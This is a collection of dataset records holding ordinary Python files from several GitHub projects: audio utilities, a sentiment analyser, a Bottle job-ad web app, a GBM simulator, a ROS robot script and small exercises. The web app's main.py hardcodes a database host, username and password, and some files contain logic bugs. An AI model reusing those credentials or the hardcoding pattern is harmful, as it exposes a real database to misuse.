Pack a integer to a struct for using in serial communication.\n \n :param num: integer to pack.\n :return num: as a packed integer for use in serial communication. \n \"\"\"\n return struct.unpack(\"HH\", struct.pack(\"i\", num))\n\n def to_fixed_point(num):\n \"\"\"\n Pack a number to a fixed point type and pack it as a struct.\n \n :param num: number to pack to a fixed point type.\n :return num: as a packed fixed point for use in serial communication. \n \"\"\"\n return pack_int(math.floor(num * 0x10000)) # Magic? No.\n\n # Unpack into word16\n (pos_low, pos_hi) = pack_int(pos_amount)\n (accel_low, accel_hi) = to_fixed_point(acceleration)\n (speed_low, speed_hi) = to_fixed_point(speed)\n # Return the program\n return assemble_program([\n CACC(accel_low, accel_hi),\n CSPD(speed_low, speed_hi),\n CPOS(pos_low, pos_hi),\n CSET(0xDFFF, 0x0000),\n CSET(0xBFC1, 0x8701),\n CSET(0xFFFF, 0x4000),\n UPD()#,\n # NOTMC(),\n # WAIT()\n ])\n\n","repo_name":"PUM-9/TreeD","sub_path":"technosoft-linear-drive/src/technosoftlineardrive/assemblyprogram.py","file_name":"assemblyprogram.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9229176081","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 10 11:37:11 2023\n\n@author: User\n\"\"\"\nimport pandas as pd\nfrom textblob import Blobber #pip install textblob\nfrom textblob_fr import PatternTagger, PatternAnalyzer #pip install textblob-fr\ntb = Blobber(pos_tagger=PatternTagger(), analyzer=PatternAnalyzer())\n\n\n\ndef note(nb):\n if nb > 0 : \n return \"Positif\"\n elif nb < 0 : \n return \"Négatif\"\n else:\n return \"Neutre\"\n\n\n\ndef analyse_sentiment(data):\n dictionnaire = {}\n for auteur in data[\"author\"].unique():\n dictionnaire[auteur] = []\n \n data.loc[max(data.index)+1] = [0,0,\"\",0,0,\"\",\"\",\"\"]\n parole = data[\"author\"][0]\n text = \"\"\n for i in data.index:\n if parole == data[\"author\"][i]:\n text += \" \"+data[\"text\"][i]\n else: \n analysis = note(tb(text).sentiment[0])\n dictionnaire[data[\"author\"][i-1]].append(analysis)\n parole = data[\"author\"][i]\n text = data[\"text\"][i]\n \n \n \n sentiment = {}\n sentiment[\"global\"] = [0,0,0]\n for auteur in dictionnaire.keys():\n sentiment[auteur] = [dictionnaire[auteur].count('Positif'),dictionnaire[auteur].count('Neutre'),dictionnaire[auteur].count('Négatif')]\n \n sentiment[\"global\"][0] += dictionnaire[auteur].count('Positif')\n sentiment[\"global\"][1] += dictionnaire[auteur].count('Neutre')\n sentiment[\"global\"][2] += dictionnaire[auteur].count('Négatif')\n \n return sentiment\n\n\n \n\n","repo_name":"TMayling/IR","sub_path":"Sentiment_Analysis_Signature.py","file_name":"Sentiment_Analysis_Signature.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73143685288","text":"# pylint: disable=E1101:no-member\r\n\"\"\"\r\nAudio utils.\r\n\"\"\"\r\nfrom typing import Optional\r\nimport torch\r\nfrom torch.nn.functional import pad\r\nfrom torchaudio.functional import resample\r\n\r\n\r\ndef convert_audio(\r\n audio: torch.Tensor,\r\n sample_rate: int,\r\n target_sample_rate: int,\r\n target_channels: int,\r\n target_duration: Optional[float] = None,\r\n normalize: bool = False,\r\n fadeout_duration: float = 0.1,\r\n) -> torch.Tensor:\r\n \"\"\"\r\n Converts an audio tensor to the desired sample rate, number of channels, and duration using various transformations.\r\n\r\n Args:\r\n audio (torch.Tensor): The input audio tensor of shape (n_sounds, n_channels, n_samples).\r\n sample_rate (int): The sample rate of the input audio tensor.\r\n target_sample_rate (int): The target sample rate to convert the input audio tensor to.\r\n target_channels (int): The target number of channels to convert the input audio tensor to.\r\n target_duration (float): The target duration of the output audio tensor in seconds.\r\n Note that the input audio tensor will be padded or truncated (with a fade out - see below)\r\n to the target length if necessary. Pass None to leave the input audio tensor unchanged. (Default: None)\r\n normalize (bool): Whether to normalize the input audio tensor. (Default: False)\r\n fadeout_duration (float): The duration of the fadeout in seconds. If not specified, defaults to 100ms.\r\n (Default: 0.1)\r\n\r\n Returns:\r\n torch.Tensor: The transformed audio tensor of the specified sample rate, number of channels, and duration.\r\n \"\"\"\r\n assert audio.shape[-2] in [1, 2], \"Audio must be mono or stereo.\"\r\n\r\n # convert to mono if required\r\n audio = (\r\n audio.mean(-2, keepdim=True)\r\n if (target_channels == 1) and (audio.shape[-2] == 2)\r\n else audio\r\n )\r\n\r\n # convert to stereo if required\r\n if (target_channels == 2) and (audio.shape[-2] == 1):\r\n audio = audio.expand(*audio.shape[:-2], target_channels, -1)\r\n\r\n # resample to target sample rate\r\n if sample_rate != target_sample_rate:\r\n audio = audio.clone() # might raise an error without\r\n audio = resample(audio, sample_rate, target_sample_rate)\r\n\r\n # truncate to target duration and apply fade out if required\r\n if target_duration is not None:\r\n target_num_samples = int(target_duration * target_sample_rate)\r\n\r\n if audio.shape[-1] > target_num_samples:\r\n fadeout_num_samples = int(fadeout_duration * target_sample_rate)\r\n fadeout = (\r\n torch.linspace(1, 0, fadeout_num_samples)\r\n if fadeout_num_samples > 0\r\n else 1.0\r\n )\r\n audio = audio[..., :target_num_samples]\r\n audio[..., -fadeout_num_samples:] *= fadeout\r\n\r\n # zero-pad to target duration if required\r\n elif audio.shape[-1] < target_num_samples:\r\n audio = pad(audio, (0, target_num_samples - audio.shape[-1]))\r\n\r\n # normalize if required\r\n audio = (\r\n (audio / audio.abs().amax((-2, -1), keepdim=True)) * 0.99\r\n if normalize\r\n else audio\r\n )\r\n\r\n return audio\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"utils/audio.py run successfully.\")\r\n","repo_name":"pcmbs/preset-embedding_audio-model-selection","sub_path":"src/utils/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9854431652","text":"import requests\nimport os\nfrom iidda_api import read_config\nimport aiohttp\nimport asyncio\nfrom iidda_api import get_release_list\nfrom aiohttp_client_cache import FileBackend\nfrom appdirs import *\n\n\ndef convert_to_raw(url):\n '''Converts github.com url to raw.githubusercontent.com url\n\n Args:\n url (str): link with base url \"github.com\" to a file stored on github\n\n Returns:\n str: equivalent url with \"raw.githubusercontent.com\" base url\n '''\n return url.replace(\"github.com\", \"raw.githubusercontent.com\").replace(\"/blob/\", \"/\")\n\n\nasync def get_pipeline_dependencies(dataset_name, version=\"latest\", version_tag=\"\"):\n '''Downloads all pipeline_dependencies of a dataset\n\n Args:\n dataset_name (str): name of the dataset\n version (str, int, optional): version of the dataset\n version_tag (str, optional): version prefix of dataset (e.g. \"v9-\" indicates version 9 of a particular dataset)\n\n Returns:\n list: list of tuples. Each tuple contains a file's name and content\n '''\n # Get access token\n ACCESS_TOKEN = read_config('access_token')\n # make cache directory\n cache_path = user_cache_dir(\"iidda-api-cache\", \"\")\n if not os.path.isdir(cache_path):\n os.makedirs(cache_path)\n # Cache configurations\n release_list_cache = FileBackend(\n cache_name=cache_path + \"/release_list\"\n )\n\n releases = asyncio.run(get_release_list(\n ACCESS_TOKEN, release_list_cache, clear_cache=False))\n\n # filter through and sort all releases of this name ascending by version\n release_list = filter(\n lambda release: release['name'] == dataset_name, releases)\n release_list = sorted(\n release_list, key=lambda release: int(release['body'][8:]))\n\n # check if dataset is contained in repo\n if not release_list:\n return \"This dataset does not exist in the releases\"\n\n if version == \"latest\":\n version = len(release_list)\n\n if int(version) > len(release_list):\n return f\"The supplied version is greater than the latest version. 
The latest version is {len(release_list)}\"\n\n release = release_list[int(version) - 1]\n\n headers = {\n 'Authorization': 'token ' + ACCESS_TOKEN,\n 'Accept': 'application/octet-stream'\n }\n\n for asset in release['assets']:\n if asset['name'] == dataset_name + \".json\":\n response = requests.get(asset['url'], stream=True, headers=headers)\n if response.ok:\n dataset_metadata = response.json()\n\n async def main():\n async with aiohttp.ClientSession(headers={'Authorization': 'token ' + ACCESS_TOKEN, 'Accept': 'application/vnd.github.v3.raw'}) as session:\n tasks = []\n for relatedIdentifier in dataset_metadata['relatedIdentifiers']:\n if relatedIdentifier['relatedIdentifierType'] == \"URL\":\n if isinstance(relatedIdentifier['relatedIdentifier'], list):\n for link in relatedIdentifier['relatedIdentifier']:\n url = convert_to_raw(link)\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n else:\n url = convert_to_raw(\n relatedIdentifier['relatedIdentifier'])\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n\n files = await asyncio.gather(*tasks)\n return files\n\n async def download_dependencies(url, session):\n if url == \"on mcmaster math server (file to large for github)\":\n file_name = file_name = version_tag + dataset_name + \"/\" + \\\n version_tag + dataset_name + \"_dependencies/\" + url + \".txt\"\n return (file_name, \"on mcmaster math server (file to large for github)\")\n else:\n file_name = version_tag + dataset_name + \"/\" + version_tag + \\\n dataset_name + \"_dependencies/\" + \\\n os.path.basename(url[34:])\n async with session.get(url) as response:\n file_content = await response.read()\n return (file_name, file_content)\n\n return asyncio.run(main())\n else:\n return \"Failure in getting assets from GitHub {}\\n{}\".format(response.status_code, response.text)\n","repo_name":"canmod/iidda-tools","sub_path":"python/iidda_api/get_pipeline_dependencies.py","file_name":"get_pipeline_dependencies.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4482114356","text":"# *-* coding:utf-8 *-*\n#!/usr/bin/python\n'''\n*******Creator*******\nSe varje funktion\n'''\nimport bottle\nfrom modules import log\nfrom modules import handleUsers\nfrom modules import addmod\nfrom bottle import route, get, post, run, template, error, static_file, request, redirect, abort, response, app\nfrom beaker.middleware import SessionMiddleware\nimport MySQLdb\n\ndb = None\ncursor = None\n\ndef call_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tglobal cursor\n\tdb = MySQLdb.connect(host=\"195.178.232.16\", port=3306, user=\"AC8240\", passwd=\"hejhej123\", db=\"AC8240\")\n\tcursor = db.cursor()\n\treturn cursor\n\ndef hang_up_on_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tdb = db.close()\n\n'''*********Routes*********'''\n\n@route('/')\ndef startPage():\n\t#Skriven av: Jari\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\tredirect('/login')\n\n\n'''*********Login*********'''\n\n@route('/login')\ndef login():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn template('login', pageTitle='Logga in')\n\n\n@route('/ajax', method=\"POST\")\ndef ajax_validation():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresult = log.ajax_validation(cursor)\n\thang_up_on_database()\n\tif result == False:\n\t\treturn 'error'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_login', method='POST')\ndef do_login():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresponse = log.login(cursor)\n\thang_up_on_database()\n\tif response == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error('Tyvärr - användaren finns inte!')\n\n\n@route('/log_out')\ndef log_out():\n\t#Skriven av: Jacob\n\tlog.log_out()\n\tredirect('/login')\n\n@route('/admin')\ndef admin():\n\t#Skriven av: Jacob & Jari\n\t#Mindre uppdateringar: Sofia\n\tlog.validate_autho() #kontrollerar om användaren är inloggad\n\tcursor = call_database()\n\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\n\tif user_level == 1:\n\t\tads_untreated = []\n\t\tads_ongoing = []\n\t\tads_finished = []\n\n\t\tads_to_apply_on=addmod.available_ads(userid, cursor)\n\t\tall_ads=addmod.sort_by_status(userid, cursor)\n\t\tfor each in all_ads:\n\t\t\tif each[7]=='Obehandlad':\n\t\t\t\tads_untreated.append(each)\n\t\t\telif each[7]=='Vald':\n\t\t\t\tads_ongoing.append(each)\n\t\t\telif each[7]=='Avslutad':\n\t\t\t\tads_finished.append(each)\n\t\tdenied_missions = addmod.get_denied_missions(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('student_start',finished_ads=ads_finished, avail_ads=ads_to_apply_on, accepted_on=ads_ongoing, pending_ad=ads_untreated, user_id=userid, user=username, level=\"student\", pageTitle = 'Start', denied_missions=denied_missions)\n\n\telse:\n\t\temployer_ads = addmod.get_my_ads(userid, cursor)\n\t\tstudents = addmod.students_that_applied(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('employer_start', user=username, user_id=userid, level=\"arbetsgivare\", annons=employer_ads, pageTitle = 'Start', students_application = students)\n\n@route('/about_us')\ndef about_us_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('about_us', pageTitle = 'Om Questway', 
user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('about_us', pageTitle = 'Om Questway', user=username, user_autho=user_level, user_id=userid)\n\n@route('/help')\ndef help_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user = username, user_autho=user_level, user_id = userid)\n\n'''********Create-user********'''\n@route('/create')\ndef create_user():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_user', pageTitle='Student | Uppdragsgivare')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_student')\ndef create_student():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_student', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_employer')\ndef create_employer():\n\t#Skriven av Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_employer', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/ajax_create_user', method=\"POST\")\ndef ajax_create_validation():\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tresult = handleUsers.ajax_new_user_validation(cursor)\n\thang_up_on_database()\n\tif result['result'] == False and result['error'] == 'Bad input':\n\t\treturn 'Bad input'\n\telif result['result'] == False and result['error'] == 'User exists':\n\t\treturn 'User exists'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_create_user/', method = 'POST')\ndef do_create_user(user):\n\t#Skriven av Jacob\n\tglobal db\n\tif log.is_user_logged_in()==False:\n\t\tcursor = call_database()\n\t\tif user == \"student\":\n\t\t\tresponse = handleUsers.create_student(cursor)\n\t\telif user == \"employer\":\n\t\t\tresponse = handleUsers.create_employer(cursor)\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(\"Något har blivit fel!\")\n\t\tdb.commit()\n\t\tif response['result'] == True:\n\t\t\tlog.log_in_new_user(response['email'], response['password'], cursor)\n\t\t\thang_up_on_database()\n\t\t\tredirect('/admin')\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(response['error'])\n\telse:\n\t\tredirect('/admin')\n\n@route('/profiles/')\ndef profiles(user):\n\t#Skriven av Jacob\n\ttry:\n\t\tuser = int(user)\n\texcept:\n\t\treturn return_error('Användaren finns inte!')\n\n\tcursor = call_database()\n\tuser_profile_data = handleUsers.show_student_profile(user, cursor)\n\tis_user_logged_in = log.is_user_logged_in()\n\n\tgrading_ads = addmod.grading_ads(user, cursor)\n\tgrading_skills = addmod.get_ad_skills(user, cursor)\n\tusername = \"\"\n\tthis_user = False\n\tif is_user_logged_in == True:\n\t\tuser_levle = log.get_user_level(cursor)\n\t\tusername = 
log.get_user_name(cursor)\n\t\tlogged_in_id = log.get_user_id_logged_in()\n\t\tif logged_in_id == user:\n\t\t\tthis_user = True\n\telse:\n\t\tuser_levle = 0\n\n\thang_up_on_database()\n\n\tif user_profile_data['exists'] == True:\n\t\teducation_info = user_profile_data['education_info']\n\t\tstudent_info = user_profile_data['student_info']\n\t\tstudent_name = student_info[0] + ' ' + student_info[1]\n\t\treturn template('user_profile', user = username, user_autho = user_levle, user_id = user, student= student_info, education = education_info, pageTitle = student_name, grading = grading_ads, grading_skills = grading_skills, this_user=this_user )\n\n\telse:\n\t\treturn return_error('Användaren finns inte!')\n\n@route('/edit_mission//', method=\"POST\")\ndef edit_mission(user,ad_id):\n\t#Skriven av Jacob\n\tglobal db\n\ttry:\n\t\tint(user)\n\t\tint(ad_id)\n\texcept:\n\t\treturn return_error('Något har blciti fel!')\n\tlog.validate_autho()\n\tif int(log.get_user_id_logged_in()) == int(user):\n\t\tcursor = call_database()\n\t\taddmod.edit_mission(ad_id, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/profiles/' + str(user))\n\treturn return_error('Ej behörighet!')\n\n\n'''********Ad-management********'''\n\n@route('/do_new_ad')\ndef do_new_ad():\n\t#Skriven av Jari\n\t'''Returns a view where the logged-in employer can fill in information for a new ad'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tusername=log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('adsform.tpl',user=username, pageTitle = 'Annonser')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/make_ad', method=\"POST\")\ndef ad_done():\n\t#Skriven av Jari\n\t'''Creates a new ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.do_ad(cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n\n@route('/make_ad')\ndef no_get():\n\t#Skriven av Jari\n\tredirect('/admin')\n\n\n'''*****Delete ad*****'''\n\n@route('/del_ad/', method=\"POST\")\ndef del_ad(which_ad):\n\t#Skriven av Jari\n\t'''Deletes a specifik ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_logged_in=log.get_user_id_logged_in()\n\t\taddmod.erase_ad(which_ad, user_logged_in, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n'''****Students can apply on an ad****'''\n\n@route('/apply_on_ad/', method=\"POST\")\ndef apply_for_mission(which_ad):\n\t#Skriven av Jari\n\t'''Onclick on template - student applies on a specifik ad'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.applying_for_mission(which_ad, cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n'''****All the ads and their applications listed***'''\n\n@route('/allMissions')\ndef list_applied_students():\n\t#Skriven av Jari\n\t'''lists all ads with their specific application status'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_id=log.get_user_id_logged_in()\n\t\tusername=log.get_user_name(cursor)\n\t\trelevant_adds=addmod.get_my_ads(user_id, 
cursor)\n\t\tstudents_application = addmod.students_that_applied(user_id, cursor)\n\t\tfeedback_info = addmod.get_given_feedback_for_employers(user_id, cursor)\n\t\thang_up_on_database()\n\t\treturn template('adds.tpl',user_id=user_id, user=username, adds=relevant_adds, students=students_application, pageTitle='Alla uppdrag', feedback = feedback_info)\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/select_student//')\ndef accepted_ones(ad, appliersID):\n\t#Skriven av Jari\n\tglobal db\n\tcursor = call_database()\n\tif log.get_user_level(cursor) == 2:\n\t\taddmod.who_got_accepted(ad, appliersID, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect ('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/ad_done/', method=\"POST\")\ndef ad_done(ad):\n\t#Skriven av Jari\n\tglobal db\n\ttry:\n\t\tint(ad)\n\texcept:\n\t\treturn return_error('Nu har något blivit fel!')\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tresponse = addmod.move_ad_to_complete(int(ad), cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tif response['response'] == False:\n\t\t\treturn return_error(response['error'])\n\t\telse:\n\t\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/give_feedback/')\ndef give_feedback(ad_nr):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2 and log.get_user_id_logged_in() == addmod.get_ad_creator_id(cursor, int(ad_nr)):\n\t\tusername = log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('feedback', adnr=ad_nr, pageTitle = 'Ge feedback', user=username )\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\ndef return_error(error_message):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tif log.is_user_logged_in == True:\n\t\tuserid = log.get_user_id_logged_in()\n\t\tuser_level = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\treturn template('error_message', pageTitle = error_message, user = username, user_autho = user_level, user_id = user, error_message=error_message)\n\telse:\n\t\treturn template('error_message', pageTitle = error_message, user_autho = 3, error_message=error_message)\n\n\n'''********Övriga Routes********'''\n\n@error(404)\ndef error404(error):\n return template('pagenotfound', pageTitle = 'Fel!' )\n\n@route('/static/')\ndef server_static(filename):\n return static_file(filename, root=\"static\")\n\n\napp = SessionMiddleware(app(), log.session_opts)\nrun(app=app)\n","repo_name":"j-j-hoff/Questway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73686857448","text":"maior = 0\nmenor = 0\nnumeros = []\nfor x in range(0, 5):\n numeros.append(int(input('Digite um número inteiro: ')))\n if x == 0:\n maior = menor = numeros[x]\n elif numeros[x] > maior:\n maior = numeros[x]\n elif numeros[x] < maior:\n menor = numeros[x]\nprint(f'A lista de números digitadas foi {numeros}')\nprint(f'O maior número foi {maior} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == maior:\n print(f'{p}...', end='')\nprint(f'\\nO menor número foi {menor} e está na posição: ', end='')\nfor p, n in enumerate(numeros):\n if n == menor:\n print(f'{p}...', end='')","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex078b.py","file_name":"ex078b.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"340366978","text":"config, instructions = [part.split(\"\\n\") for part in open(\"input.txt\", \"r\").read().split(\"\\n\\n\")]\nstacks = [[] for i in range(max([int(s) for s in config[-1].split() if s.isdigit()]))]\nfor line in config[:-1]:\n for i, box in enumerate(line[1::4]):\n if box != ' ': stacks[i] += box\n \nstack1, stack2 = stacks[:], stacks[:]\nfor line in instructions:\n n, src, dest = [int(s) for s in line.split() if s.isdigit()]\n stack1[src-1], stack1[dest-1] = stack1[src-1][n:], stack1[src-1][:n][::-1] + stack1[dest-1]\n stack2[src-1], stack2[dest-1] = stack2[src-1][n:], stack2[src-1][:n] + stack2[dest-1]\n\nprint('Task 1: ', ''.join(s[0] for s in stack1 if s))\nprint('Task 2: ', ''.join(s[0] for s in stack2 if s))","repo_name":"rklimpel/Advent-of-Code-2022","sub_path":"05/fancy.py","file_name":"fancy.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23589889074","text":"import numpy as np\nimport sys\nimport numba\n\ndef simulate_gbm(n, s, r, div_yield, t, t_terminal, dt, sigma, method = \"euler\", seed = None):\n \"\"\"\n Simulate a geometric brownian motion path\n :param n: Number of simulations\n :param s: Stock price at time t\n :param r: Risk free interest rate\n :param div_yield: Continuous dividend yield\n :param t_terminal: Terminal time\n :param t: Starting time\n :param dt: Discretization time step size\n :param sigma: Volatility\n :param method: Simulation method, either \"euler\" or \"milstein\"\n :param seed: Random seed used\n :return: An array containing the n simulations as rows and the time steps as columns\n \"\"\"\n\n # Set the seed\n if seed is not None:\n np.random.seed(seed)\n\n # Total time steps\n t_total = int((t_terminal - t) / dt)\n\n # Random normal generation\n z = np.random.randn(n, t_total)\n\n # Fill in the simulation matrix\n s_t = dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method)\n\n return s_t\n\n\ndef dispatch_simulation(n, s, r, div_yield, dt, sigma, z, method):\n '''\n Dispatch the simulation to the appropriate algorithm\n :return: s_t filled with the simulation values\n '''\n\n if method == \"euler\":\n\n s_t = simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z)\n\n elif method == \"milstein\":\n\n s_t = simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z)\n\n else:\n\n sys.exit(\"Method not supported.\")\n\n return s_t\n\n\ndef simulate_gbm_euler(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Euler discretization\n :return: s_t filled with the simulation values by Euler\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z,\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t\n\n\ndef simulate_gbm_milstein(n, s, r, div_yield, dt, sigma, z):\n '''\n GBM simulation using a Milstein discretization\n :return: s_t filled with the simulation values by Milstein\n '''\n\n cumprod_z = np.cumprod(1 + (r - div_yield) * dt + sigma * np.sqrt(dt) * z \\\n + .5 * sigma * sigma * ((np.sqrt(dt) * z) ** 2 - dt),\n axis = 1)\n\n cumprod_z = np.column_stack((np.ones([n, 1]), cumprod_z))\n\n s_t = s * cumprod_z\n\n return s_t","repo_name":"DavisVaughan/uncc-math-6204","sub_path":"assignments/hw-03 efficient/gbm_simulator.py","file_name":"gbm_simulator.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18564363775","text":"#!/usr/bin/env python\n\nimport rospy\nfrom rospy import Time, Duration\nfrom geometry_msgs.msg import Twist, Pose\nfrom nav_msgs.msg import Odometry\nimport math\nfrom datetime import datetime\nimport time\n\n\ndef zad1():\n VEL_LIN = 0.08*2.4\n VEL_ANG = 0.09*2.4\n\n TURN_RIGHT = 0\n SIDE_LENGHT = 1.0\n\n pub = rospy.Publisher('key_vel', Twist, queue_size=10)\n sub = rospy.Subscriber(\"/mobile_base_controller/odom\", Odometry, callback)\n rospy.init_node('zad1', anonymous=True)\n rate = rospy.Rate(50) # 10hz\n\n vel = Twist()\n\n i = 0\n while not rospy.is_shutdown():\n i+=1\n global time_now\n if i>2:\n \n now = rospy.Time.now()\n time_now = now.secs + float(now.nsecs)/1000000000\n lin, ang = go_square(SIDE_LENGHT, TURN_RIGHT, VEL_LIN, VEL_ANG)\n vel.linear.x = lin\n vel.angular.z = ang\n\n if i == 2:\n global start_time\n now = rospy.Time.now()\n start_time = now.secs + float(now.nsecs)/1000000000\n \n pub.publish(vel)\n rate.sleep()\n\n\ndef callback(data):\n global pose\n pose = Pose()\n pose = data.pose.pose\n\n\ndef calc_time_lin(a, vel_lin):\n return a/vel_lin\n\n\ndef calc_time_ang(vel_ang):\n return (math.pi/2)/vel_ang\n\n\ndef go_square(side_lenght, turn_right, vel_lin, vel_ang):\n global start_time\n\n TIME_LIN = calc_time_lin(side_lenght, vel_lin)\n TIME_ANG = calc_time_ang(vel_ang)\n\n duration = time_now - start_time\n print(duration)\n if duration < TIME_LIN:\n lin = vel_lin\n ang = 0\n elif duration >= TIME_LIN and duration <= TIME_LIN + TIME_ANG:\n lin = 0.0\n if turn_right:\n ang = -vel_ang\n else:\n ang = vel_ang\n else:\n start_time = time_now\n lin = 0\n ang = 0\n\n\n return lin, ang\n\n\nif __name__ == '__main__':\n try:\n zad1()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"kamil-szczepanik/Control-and-Simulation-of-Robots","sub_path":"mobile/scripts/lab1/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
